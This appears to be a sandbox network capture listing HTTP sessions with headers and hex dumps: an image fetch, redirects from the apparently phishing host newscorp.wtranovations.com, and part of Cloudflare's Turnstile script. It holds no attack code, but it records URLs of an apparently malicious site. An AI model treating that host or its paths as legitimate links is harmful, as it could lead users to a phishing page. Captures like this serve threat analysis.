                                                                                                                                                                                                                      Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1739995219&sid=c46efe9b-d3d2-4a0c-8c76-bfafa16c5add&s=J5yafVwiznLDsWPsONAqf1a6tRMttxbHnFHFaMwU3F8%3D
                                                                                                                                                                                                                      Vary: Accept
                                                                                                                                                                                                                      Via: 1.1 vegur
                                                                                                                                                                                                                      X-Request-Id: 59b40012-a5f8-4f6c-83fd-fb0c16768506
                                                                                                                                                                                                                      last-modified: Wed, 19 Feb 2025 20:00:19 GMT
                                                                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 923e23b6b9f6c007-ATL
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      2025-03-21 14:29:05 UTC171INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 02 3a 50 4c 54 45 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                      Data Ascii: PNGIHDR$:PLTE
                                                                                                                                                                                                                      2025-03-21 14:29:05 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                      2025-03-21 14:29:05 UTC1369INData Raw: d4 72 b0 53 40 a5 ff b1 ef 47 31 ff 48 05 d4 f9 cf 89 a8 e6 ad cc f4 1d 50 f3 fe 67 e6 e6 a8 66 4f a6 0d a8 ba ff cc 6d 51 cd ee 54 40 9d ff fc 67 54 33 99 99 5e 81 9a fd cf cc 7b a2 9a 8b 32 6d 40 d5 fd 67 fe 3f aa d9 3e 50 40 9d ff c1 f6 28 e7 f2 54 40 95 ff dc 1a f5 7c 23 33 7d 07 54 bc ff 99 39 19 f5 7c b3 4b 1b 50 73 ff d9 6d 89 06 b8 34 15 50 e3 3f 2f 8f 16 b8 2c d3 2b 50 b1 ff 99 8b d1 02 73 8f a6 0d a8 b8 ff bc 6e 21 9a e0 c7 a9 80 0a ff b9 21 da e0 96 89 f4 0a f4 bf ff 39 3c 2f 1a e1 9d b4 01 fd df 7f 3e 13 ad 30 f3 9c 02 fa f7 7f 60 26 9a e1 8a 2e bd 02 fd ee 7f 76 fb a3 21 8e a7 0d e8 f7 fe f3 47 d1 12 d3 f7 2b a0 5f ff 3b 36 45 53 3c 3c 4c af 40 7f fb 9f fb 5e 89 c6 d8 3b b0 01 fd dd ff e0 f9 68 8e 1b d7 2a a0 2f ff 63 57 45 83 8c 77 5e 81 7e
                                                                                                                                                                                                                      Data Ascii: rS@G1HPgfOmQT@gT3^{2m@g?>P@(T@|#3}T9|KPsm4P?/,+Psn!!9</>0`&.v!G+_;6ES<<L@^;h*/cWEw^~
                                                                                                                                                                                                                      2025-03-21 14:29:05 UTC433INData Raw: 89 16 98 1d ba ff 9a 0d b8 6e 21 9a e0 76 fe 6b 0a d8 10 6d 70 c7 c0 fe 57 bc 02 1b cf 8b 46 78 c8 fd 57 6c c0 64 b4 c2 c2 6b fc f7 5f c0 ab d3 d1 0c af db ff fe 5f 81 7f 45 43 5c ef fe fb de 80 1f 44 4b ac bf 96 ff 7e 0b 38 30 17 4d f1 ad 81 fd ef f3 15 b8 f8 27 d1 18 37 ae 75 ff fd 6d c0 ea 9f 46 73 dc ca 7f 7f 05 ac 8a 06 b9 70 f9 1d 8f f3 1f 31 be 3a 97 cb 85 d1 24 4f 2f f3 15 38 f1 1e fb 1f 71 ce d4 32 ef e6 a9 33 e3 3f d9 b7 97 fb 8f f9 e1 70 59 77 73 73 34 cb 6d 3f cf 25 b3 e3 15 e6 3f 61 cb a5 b9 64 1e 78 30 1a 66 dd f5 b9 34 ba e3 9b 78 ff 94 99 f9 b1 5c 1a 4f ae 8f b6 b9 ea c5 5c 02 07 f6 93 fe 59 ee fd 4f 2e 81 d7 ee 8a e6 99 7b 77 90 5f c0 f0 99 19 c6 4f 66 e6 d8 44 7e 01 53 f3 0b b1 12 f8 f5 fc 6f f3 34 3c 3a 7f 0b dd a7 62 76 d7 e1 3c 0d 1b
                                                                                                                                                                                                                      Data Ascii: n!vkmpWFxWldk__EC\DK~80M'7umFsp1:$O/8q23?pYwss4m?%?adx0f4x\O\YO.{w_OfD~So4<:bv<


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      13192.168.11.1249383104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:05 UTC413OUTGET /ad083999f1/start?for=/edzxesfee/d205afd3/ HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Origin: https://newscorp.wtranovations.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:05 UTC1184INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:05 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: max-age=3600
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:05 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/ad083999f1/start?for=/edzxesfee/d205afd3/
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4KhlVg5HX5vN6GgLg9YM3J10cMJd6n4TqCXJ%2FIngNgKniatSVSzJ6HLhHRyPxkn1jYrFWAgh0H6ntMAe0EVnQGYint5ntl4zQcCY7ypxAFQeFzS27%2FlcKMrqA2hcRWXRH3Onp5bnwEegiMRhhQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=74&min_rtt=74&rtt_var=37&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=608&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 923e23b70cb616cc-IAH
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=128125&min_rtt=128064&rtt_var=27109&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=991&delivery_rate=31480&cwnd=111&unsent_bytes=0&cid=b62d0eaa7360b571&ts=482&x=0"
                                                                                                                                                                                                                      2025-03-21 14:29:05 UTC173INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                                                                                                                                                                      2025-03-21 14:29:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      14192.168.11.1249390104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:05 UTC370OUTGET /statsic/css/main.output.css HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:06 UTC1171INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:06 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: max-age=14400
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:06 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/statsic/css/main.output.css
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uJCn5ZV0AZj3H3oSusErPqZ3NBMar0L%2FQM2m68W%2F070W5doQOXHdJlUzfSxnomowJvgbcHOoxHYqgdPqzFkITsPmhx87C8rydg6XzPpCbRuLY2xyQrxpxVQwcMEqWcX1rLAQZnuhur9w3P9xqQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=44&min_rtt=44&rtt_var=22&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=663&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      CF-Cache-Status: EXPIRED
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 923e23b9cda0128b-MIA
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=128833&min_rtt=128613&rtt_var=27240&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=948&delivery_rate=31329&cwnd=252&unsent_bytes=0&cid=d40db886c3fa795b&ts=334&x=0"
                                                                                                                                                                                                                      2025-03-21 14:29:06 UTC173INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                                                                                                                                                                      2025-03-21 14:29:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      15192.168.11.1249391104.18.95.41443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:06 UTC361OUTGET /turnstile/v0/b/708f7a809116/api.js HTTP/1.1
                                                                                                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:06 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:06 GMT
                                                                                                                                                                                                                      Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                      Content-Length: 48123
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                      last-modified: Tue, 18 Mar 2025 12:36:20 GMT
                                                                                                                                                                                                                      cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                      cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 923e23b9edca06e2-ATL
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      2025-03-21 14:29:06 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 6a 74 28 65 2c 74 2c 61 2c 6f 2c 63 2c 6c 2c 76 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 6c 5d 28 76 29 2c 73 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 61 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 74 28 73 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 73 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 71 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2c 61 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 74 2c 61 29 3b 66 75 6e 63 74
                                                                                                                                                                                                                      Data Ascii: "use strict";(function(){function jt(e,t,a,o,c,l,v){try{var h=e[l](v),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function qt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);funct
                                                                                                                                                                                                                      2025-03-21 14:29:06 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 49 72 28 65 2c 74 29 7b 76 61 72 20 61 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 74 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 61 2e 70 75 73 68 2e 61 70 70 6c 79 28 61 2c 6f 29 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 69 74 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 3d 74 21 3d 6e 75
                                                                                                                                                                                                                      Data Ascii: e}function Ir(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);t&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),a.push.apply(a,o)}return a}function it(e,t){return t=t!=nu
                                                                                                                                                                                                                      2025-03-21 14:29:06 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 6f 74 28 65 2c 74 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 7a 74 28 65 29 7c 7c 42 74 28 65 2c 74 29 7c 7c 58 74 28 65 2c 74 29 7c 7c 47 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 50 65 28 65 2c 74 29 7b 76 61 72 20 61 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30
                                                                                                                                                                                                                      Data Ascii: ray$/.test(a))return ot(e,t)}}function Ie(e,t){return zt(e)||Bt(e,t)||Xt(e,t)||Gt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Pe(e,t){var a={label:0,sent:function(){if(l[0
                                                                                                                                                                                                                      2025-03-21 14:29:06 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 51 74 3d 33 30 30 30 32 30 3b 76 61 72 20 57 65 3d 33 30 30 30 33 30 3b 76 61 72 20 55 65 3d 33 30 30 30 33 31 3b 76 61 72 20 71 3b 28 66 75
                                                                                                                                                                                                                      Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Qt=300020;var We=300030;var Ue=300031;var q;(fu
                                                                                                                                                                                                                      2025-03-21 14:29:06 UTC1369INData Raw: 61 6e 75 61 6c 22 2c 65 2e 41 75 74 6f 3d 22 61 75 74 6f 22 7d 29 28 5a 7c 7c 28 5a 3d 7b 7d 29 29 3b 76 61 72 20 63 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 65 76 65 72 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 61 6e 75 61 6c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 75 74 6f 3d 22 61 75 74 6f 22 7d 29 28 63 65 7c 7c 28 63 65 3d 7b 7d 29 29 3b 76 61 72 20 51 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 6c 77 61 79 73 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 78 65 63 75 74 65 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 6e 74 65 72 61 63 74 69 6f 6e 4f 6e 6c 79 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 51 7c 7c 28 51 3d 7b 7d 29 29 3b 76 61 72 20 6d 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 52 65 6e 64 65 72 3d 22 72
                                                                                                                                                                                                                      Data Ascii: anual",e.Auto="auto"})(Z||(Z={}));var ce;(function(e){e.Never="never",e.Manual="manual",e.Auto="auto"})(ce||(ce={}));var Q;(function(e){e.Always="always",e.Execute="execute",e.InteractionOnly="interaction-only"})(Q||(Q={}));var me;(function(e){e.Render="r
                                                                                                                                                                                                                      2025-03-21 14:29:06 UTC1369INData Raw: 74 69 6f 6e 20 70 74 28 65 29 7b 72 65 74 75 72 6e 20 4c 28 5b 4d 2e 4e 6f 72 6d 61 6c 2c 4d 2e 43 6f 6d 70 61 63 74 2c 4d 2e 49 6e 76 69 73 69 62 6c 65 2c 4d 2e 46 6c 65 78 69 62 6c 65 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 76 74 28 65 29 7b 72 65 74 75 72 6e 20 4c 28 5b 22 61 75 74 6f 22 2c 22 6d 61 6e 75 61 6c 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 6d 74 28 65 29 7b 72 65 74 75 72 6e 20 4c 28 5b 22 61 75 74 6f 22 2c 22 6d 61 6e 75 61 6c 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 76 61 72 20 4e 72 3d 2f 5e 5b 61 2d 7a 5d 7b 32 2c 33 7d 28 5b 2d 5f 5d 5b 61 2d 7a 5d 7b 32 7d 29 3f 24 2f 69 3b 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 22 61 75 74 6f 22 7c 7c 4e 72 2e 74 65 73 74 28 65 29
                                                                                                                                                                                                                      Data Ascii: tion pt(e){return L([M.Normal,M.Compact,M.Invisible,M.Flexible],e)}function vt(e){return L(["auto","manual","never"],e)}function mt(e){return L(["auto","manual","never"],e)}var Nr=/^[a-z]{2,3}([-_][a-z]{2})?$/i;function gt(e){return e==="auto"||Nr.test(e)
                                                                                                                                                                                                                      2025-03-21 14:29:06 UTC1369INData Raw: 22 72 6f 2d 72 6f 22 5d 3b 66 75 6e 63 74 69 6f 6e 20 54 74 28 65 2c 74 29 7b 76 61 72 20 61 3d 22 68 74 74 70 73 3a 2f 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 22 3b 69 66 28 74 29 7b 76 61 72 20 6f 3b 61 3d 28 6f 3d 65 5b 22 62 61 73 65 2d 75 72 6c 22 5d 29 21 3d 3d 6e 75 6c 6c 26 26 6f 21 3d 3d 76 6f 69 64 20 30 3f 6f 3a 61 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 65 2c 74 2c 61 2c 6f 2c 63 2c 6c 2c 76 2c 68 29 7b 76 61 72 20 73 3d 54 74 28 61 2c 63 29 2c 70 3d 6c 3f 22 68 2f 22 2e 63 6f 6e 63 61 74 28 6c 2c 22 2f 22 29 3a 22 22 2c 5f 3d 68 3f 22 3f 22 2e 63 6f 6e 63 61 74 28 68 29 3a 22 22 2c 41 3d 61 5b 22 66 65 65 64 62 61 63 6b 2d 65 6e 61 62 6c 65 64 22 5d 3d 3d 3d 21 31 3f 22 66 62 44
                                                                                                                                                                                                                      Data Ascii: "ro-ro"];function Tt(e,t){var a="https://challenges.cloudflare.com";if(t){var o;a=(o=e["base-url"])!==null&&o!==void 0?o:a}return a}function Rt(e,t,a,o,c,l,v,h){var s=Tt(a,c),p=l?"h/".concat(l,"/"):"",_=h?"?".concat(h):"",A=a["feedback-enabled"]===!1?"fbD
                                                                                                                                                                                                                      2025-03-21 14:29:06 UTC1369INData Raw: 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 7c 7c 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 72 65 74 75 72 6e 20 6f 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 63 2c 6f 7d 2c 65 65 28 65 2c 74 29 7d 66 75 6e 63 74 69 6f 6e 20 75 72 28 65 2c 74 29 7b 69 66 28 74 79 70 65 6f 66 20 74 21 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 74 21 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 77 72 69 74
                                                                                                                                                                                                                      Data Ascii: .setPrototypeOf||function(o,c){return o.__proto__=c,o},ee(e,t)}function ur(e,t){if(typeof t!="function"&&t!==null)throw new TypeError("Super expression must either be null or a function");e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,writ
                                                                                                                                                                                                                      2025-03-21 14:29:06 UTC1369INData Raw: 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 65 65 28 63 2c 6f 29 7d 2c 47 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 73 72 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 26 26 28 46 28 74 29 3d 3d 3d 22 6f 62 6a 65 63 74 22 7c 7c 74 79 70 65 6f 66 20 74 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 3f 74 3a 7a 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 64 72 28 65 29 7b 76 61 72 20 74 3d 42 65 28 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6f 3d 6c 65 28 65 29 2c 63 3b 69 66 28 74 29 7b 76 61 72 20 6c 3d 6c 65 28 74 68 69 73 29 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3b 63 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 6f 2c 61 72 67 75 6d 65 6e 74 73 2c 6c 29 7d 65 6c 73 65 20 63 3d 6f 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72
